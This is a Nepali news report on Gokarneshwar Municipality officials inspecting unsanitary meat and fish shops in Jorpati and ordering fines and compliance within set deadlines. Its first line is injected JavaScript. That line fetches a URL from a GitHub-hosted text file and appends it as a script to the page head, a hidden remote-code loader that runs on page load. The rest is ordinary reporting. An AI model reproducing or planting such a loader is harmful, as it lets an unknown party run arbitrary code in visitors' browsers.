;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यून काठमाडौँ।
जोरपाटी ओरालोको मासु तथा माछाको पसलहरु अस्वस्थ,अब्यबस्तिथ र असुरक्षित भए पछि गोकर्णेश्वर नगरपालिका वडा नं ५ का वडा अध्यक्ष नारायण सुवेदी, प्रमुख प्रशासकीय अधिकृत वैकुण्ठ प्रसाद सापकोटा सहितको टोलीले अनुगमन गरेको छ।
अव्यवस्थित तवरले सञ्चालन गरिएको कारण त्यहाका ब्यब्सायीहरुलाई हिजो आपतकालिन बैठक राखी सम्पूर्ण ब्यवसायीहरुलाई ७ दिन भित्र राज्यले तोकेको जरिवाना भर्पाई गर्नु पर्ने र १५ दिन भित्र राज्यको मापदण्ड अनुसार ब्यवसाय सन्चालन गर्नु पर्ने अन्यथा उक्त ब्यवसायीहरुलाई नगरपालिकाले खाद्य बस्तु बिक्री बितरण र अव्यवस्थित फोहोरमैला सम्बन्धी एन अन्तर्गत मुद्दा चलाउने साथै हिजोको मिति देखि कुनै पनि प्रकारको पशु होस या पंछी जिउदा हुन् वा मृत सडकमा हिँड्ने मानिसहरूलाइ असर पर्नेगरि बाहिर राख्न नपाउने,फोहोरहरु अव्यवस्थित र ढलहरुमा ठाडै हाल्नु नपाउने ठुलाठुला फोहोर पानी जाने प्वालहरु बन्द गर्नु पर्ने र सफा गर्न प्रायोग हुने पानी फिल्टर गरिएका हुनपर्ने भनी गोकर्णेश्वर नगरपालिकाले निर्णय गरेको छ।
गोकर्नेश्वर नगरपालिकाका वडा नं ५ का वडा अध्यक्ष नारायण सुवेदी, प्रमुख प्रशासकीय अधिकृत, शाखा प्रमुख र वडा सदस्यज्युहरुको उपस्तिथिमा माइन्युट तयार पारी सो माइन्युटमा उक्त ब्यवसायिहरुको हस्ताक्षर गरी माथी उल्लेखित निर्णयहरु गरेका हुन्।
फेसबुक प्रतिक्रियाहरु